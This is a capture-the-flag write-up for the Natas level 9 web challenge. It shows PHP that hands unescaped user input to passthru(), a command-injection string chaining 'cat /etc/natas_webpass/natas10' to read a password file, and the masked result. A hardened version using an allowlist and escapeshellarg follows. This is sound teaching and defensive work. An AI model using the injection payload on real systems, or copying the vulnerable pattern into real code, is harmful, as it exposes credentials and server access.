Level nine gives us a form that takes a word and will search a file on the server side for it and return any results. We’re helpfully provided with the source code again, and after scanning through it for a minute, the passthru function call should draw our immediate attention.
<?php
$key = "";
// Read the search term straight from the request, if one was supplied.
if (array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}
// The raw value is interpolated into a shell command string with no
// validation or escaping before passthru() hands it to the shell.
if ($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>
It appears that as long as the form parameter isn’t empty, it gets used with the passthru function. This input is completely unscathed, with no other sanity checks or escaping. We can take advantage of that to inject our own commands into the string. We knew from a prior level that passwords are listed in /etc/bandit_pass/banditx, so it seems likely that we can try to get the command to cat those contents.
The string below is what I entered into the form. It completes the grep command and then uses a semicolon to begin the second command that cats our password.
stuff dictionary.txt; cat /etc/natas_webpass/natas10;
And the resulting markup returned from the server, complete with our password:
Output:
<pre>
foodstuff
foodstuff's
foodstuffs
stuff
stuffed
stuffier
stuffiest
stuffing
stuffing's
stuffs
stuffy
XXXXXXXXXXXXXXXXXX
</pre>
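For contrast, here is how the same search handler looks once the passthru call no longer trusts the request parameter. This is an added example, not the Natas source or an OverTheWire fix; the helper names is_valid_needle and build_search_command, the 64-character limit and the allowed-character set are my own assumptions about what a dictionary lookup needs to accept.

```php
<?php
// Added example (not the Natas source): a hardened version of the level's
// search handler that keeps the same behaviour for legitimate words but
// never lets request data reach the shell unquoted.

// Allowlist: a dictionary word is letters, apostrophes and hyphens only.
// Semicolons, spaces, quotes, backticks and so on are rejected outright.
// (Assumed policy; adjust the class and length to the real dictionary.)
function is_valid_needle(string $needle): bool {
    return (bool) preg_match('/^[A-Za-z\'\-]{1,64}$/', $needle);
}

// Build the grep command with the one user-controlled token wrapped in
// escapeshellarg(), so the shell sees it as a single literal argument,
// and with "--" so a needle beginning with "-" cannot become a grep flag.
function build_search_command(string $needle, string $file = 'dictionary.txt'): string {
    return 'grep -i -- ' . escapeshellarg($needle) . ' ' . escapeshellarg($file);
}

$key = '';
if (array_key_exists('needle', $_REQUEST)) {
    $key = $_REQUEST['needle'];
}

if ($key !== '') {
    if (!is_valid_needle($key)) {
        // Reject rather than "clean up": a rewritten input is hard to reason about.
        http_response_code(400);
        exit('Invalid search term.');
    }
    echo '<pre>';
    passthru(build_search_command($key));
    echo '</pre>';
}
?>
```

The two checks are deliberately redundant. The allowlist alone would refuse the string used above, since it contains spaces and a semicolon; even if the allowlist were later relaxed, escapeshellarg() would pass that whole string to grep as one quoted pattern, so the semicolon never reaches the shell as a command separator. Logging the 400 responses together with the rejected needle is also a cheap way to spot probing of this form in the web server's access log.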